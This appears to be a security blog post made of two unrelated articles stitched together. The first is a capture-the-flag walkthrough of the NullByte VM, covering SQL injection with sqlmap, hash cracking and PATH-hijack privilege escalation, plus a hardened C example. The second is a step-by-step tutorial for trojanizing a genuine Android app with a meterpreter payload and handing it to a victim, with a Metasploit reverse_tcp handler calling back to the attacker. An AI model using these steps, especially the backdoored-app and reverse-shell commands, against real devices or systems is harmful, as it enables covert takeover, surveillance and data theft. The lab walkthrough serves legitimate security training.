Hack the NullByte VM (CTF Challenge)

This is our write-up of the NullByte VM, a boot2root penetration testing challenge. Breaking into it isn't too difficult: there is no advanced exploitation or reverse engineering, and the level is considered beginner to intermediate. The goal is to find "Proof.txt" by following the steps below.

Walkthrough

Start off by finding your target.


netdiscover


Our target is 192.168.1.142. Now that we know the target, we will scan it with nmap.

nmap -p- -A 192.168.1.142


The scan shows that ports 80, 111, 777 and 44607 are open. Note that SSH is not on its default port 22 but on port 777; this port will come in handy later to gain access.
Next we open the target IP in the browser.


There is an image and a quote on the page, and nothing of interest in the page source. Something might be hidden in the image itself, so we read its metadata with exiftool:
exiftool main.gif


There you will find a comment, kzMb5nVYJw. This might be a directory name, and there is no harm in trying it in the browser, so let's do that.

Our assumption was right: it opens in the browser, but it asks for a key. We have no idea what the key is, so we run a dictionary attack against the form using Burp Suite and rockyou.txt.

The dictionary attack finds the key: elite.


Enter the key where it is asked for and the following page opens.



It now asks for a username, which again we do not know. We will look for it in the site's database using sqlmap; for this type:
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 --dbs


It will give you the name of the database, seth. Next we enumerate and dump its tables and columns; for that type:
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth

Once the command completes, it shows the table name along with its columns and the password, as shown:


As a result we have a username and a password, but the password is stored as an MD5 hash, so we need to crack it. There are many online tools for this: go to md5coder.org, paste the MD5 value, click OK and it shows the original word, omega.

Now we log in over SSH; for that type:
ssh ramses@192.168.1.142 -p 777
and give omega as the password. You are now logged in. List the directory contents with:
ls -lsa
Then read the .bash_history file:
cat .bash_history
We found nothing there, so we move on to /var/www/backup:
cd /var/www/backup/
ls -lsa
./procwatch


After much more exploring and a number of unsuccessful attempts, we had an idea: procwatch runs ps, and if we can make it run sh instead of ps we reach root directly. To achieve this we manipulate the environment: copy the shell executable (/bin/sh) into /tmp under the name ps and put /tmp at the front of PATH, so that procwatch picks up our copy instead of the real ps. Follow the steps below:

cd /tmp
cp /bin/sh /tmp/ps
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
cd /var/www/backup
./procwatch

After executing the above commands we have a root shell; then type:

id
cd /root
ls
cat proof.txt
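The escalation above works because a set-uid program executed a command by bare name and trusted the caller's PATH. As an added example (not the VM's actual procwatch source, which the write-up does not show), here is that pattern next to a hardened version; the /bin/ps path and the trusted directory prefixes are assumptions:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable: system() hands "ps" to /bin/sh, which resolves it through the
 * caller-controlled PATH. With PATH=/tmp:... and /tmp/ps a copy of /bin/sh,
 * a set-uid root process spawns a root shell instead of ps. */
int run_ps_vulnerable(void) {
    return system("ps");
}

/* A command is trusted only if it is an absolute path inside a root-owned,
 * non-writable system directory and contains no "/../" traversal.
 * Assumption: these prefixes are the only places the helper may execute from. */
int is_trusted_command(const char *cmd) {
    static const char *const ok[] = { "/bin/", "/usr/bin/", "/sbin/", "/usr/sbin/" };
    if (cmd == NULL || cmd[0] != '/' || strstr(cmd, "/../") != NULL)
        return 0;
    for (size_t i = 0; i < sizeof ok / sizeof ok[0]; i++) {
        size_t n = strlen(ok[i]);
        if (strncmp(cmd, ok[i], n) == 0 && cmd[n] != '\0')
            return 1;
    }
    return 0;
}

/* Hardened: absolute path, no shell, and an environment built from scratch so
 * the caller's PATH (and LD_* variables) never reach the privileged child. */
int run_ps_hardened(void) {
    const char *cmd = "/bin/ps";            /* assumed location of ps */
    if (!is_trusted_command(cmd))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ps", NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve(cmd, argv, envp);            /* only reached on failure */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    return run_ps_hardened() == 0 ? 0 : 1;
}
```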

Hack Android Phone using Backdoor Apk



Sometimes in hacking we have to use the most genuine-looking way so that the victim is surely hacked, and these genuine-looking ways are used to our advantage. One of the most genuine-looking ways to hack an Android phone is to bind an original Android app to your backdoor APK. backdoor-apk is software that binds an original APK file with your virus, so that nothing about it looks suspicious.
For this, first execute the following command:
apt-get install lib32stdc++6 lib32ncurses5 lib32z1



Once the command has run and the installation is done, download backdoor-apk from GitHub; for that type:



Once the software is downloaded, go to the www.apk4fun.com website and download an original APK file; I downloaded ccleaner. Then copy it into the backdoor-apk folder.
Open a terminal there and type:
./backdoor-apk.sh ccleaner.apk
As the command runs it asks which payload you want to use; select 3. It then asks for lhost and lport; give these respectively.



The above commands bind the payload to the original APK file and save the result in the backdoor-apk/original/dist folder.


Now all you have to do is send the file to the victim, who installs it by clicking Next.


and then clicking Install to install the app.


This way the app will be downloaded.


Before opening the app, open Metasploit and type:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.126
set lport 4444
exploit
After this, when you run the app, you get a meterpreter session.